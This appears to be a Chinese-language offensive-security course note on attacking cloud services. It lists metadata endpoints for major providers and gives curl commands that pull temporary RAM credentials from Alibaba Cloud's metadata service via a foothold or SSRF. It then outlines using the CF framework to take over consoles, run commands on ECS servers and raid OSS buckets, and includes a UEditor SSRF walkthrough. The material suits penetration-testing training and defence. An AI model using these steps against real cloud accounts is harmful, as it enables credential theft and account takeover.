云服务&弹性计算服务器&云数据库&实例元数据&控制角色&AK控制台接管知识点:
1、云服务-弹性计算服务器-元数据&SSRF&AK
2、云服务-云数据库-外部连接&权限提升
章节点:
云场景攻防:公有云,私有云,混合云,虚拟化集群,云桌面等
云厂商攻防:阿里云,腾讯云,华为云,亚马云,谷歌云,微软云等
云服务攻防:对象存储,云数据库,弹性计算服务器(云服务器),VPC&RAM等
云原生攻防:Docker,Kubernetes(k8s),容器逃逸,CI/CD等
一、演示案例-云服务-弹性计算服务器-元数据&SSRF&AK
元数据解释
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。(基本信息:实例ID、IP地址、网卡MAC地址、操作系统类型等信息。实例标识包括实例标识文档和实例标识签名,所有信息均实时生成,常用于快速辨别实例身份。)
各大云元数据地址:
阿里云元数据地址:http://100.100.100.200/
腾讯云元数据地址:http://metadata.tencentyun.com/
华为云元数据地址:http://169.254.169.254/
亚马云元数据地址:http://169.254.169.254/
微软云元数据地址:http://169.254.169.254/
谷歌云元数据地址:http://metadata.google.internal/
细节方面可通过访问官网找元数据访问触发说明
阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata
腾讯云例子:https://cloud.tencent.com/document/product/213/4934
1、前提条件:
弹性计算服务器配置访问控制角色
SSRF漏洞或已取得某云服务器权限(webshell或漏洞rce可以访问触发url)
2、利用环境1:获取某服务器权限后横向移动
获取关键角色信息
curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/
获取ecs角色临时凭证
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs
利用AK横向移动
CF 云渗透框架项目:https://wiki.teamssix.com/CF/
1、先配置云服务商的访问密钥
cf config
2、获取控制台
3、获取所有的ecs服务器
4、执行命令(需要先获取ecs服务器)
5、获取所有oss存储桶
能看这么多东西是授权的权限高,如果权限低的话能看的东西就很少。
3、利用环境2:某服务器上Web资产存在SSRF漏洞
获取关键角色信息
curl http://100.100.100.200/latest/meta-data/
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/
获取ecs临时凭证
curl http://100.100.100.200/latest/meta-data/ram/security-credentials/ecs
利用AK横向移动
CF 云渗透框架项目:https://wiki.teamssix.com/CF/
二、演示案例-云服务-云数据库-外部连接&权限提升
1、帐号密码
源码配置中找到(几率高)或爆破手段(几率低)
2、连接获取
白名单&外网 直接Navicat支持连接
内网需要其中内网某一个服务器做转发
3、AK利用(权限提升)
CF 云渗透框架项目:https://wiki.teamssix.com/CF/
三、演示案例-云上攻防-如何利用SSRF直接打穿云上内网
1. 利用SSRF发现打点阿里云
这里的 SSRF 漏洞触发点在 UEditor 编辑器的上传图片功能中,下面我们尝试让服务器从 https://baidu.com?.jpg 获取图片。
2. 直接利用SSRF漏洞获取目标阿里云的元数据地址
3.直接上CF利用框架项目,冲起来
4.存储桶下载后里面翻出另一个AK信息,发现这个 AK 还具有 ECS 的权限。
5.直接使用 CF拿下一键接管控制台
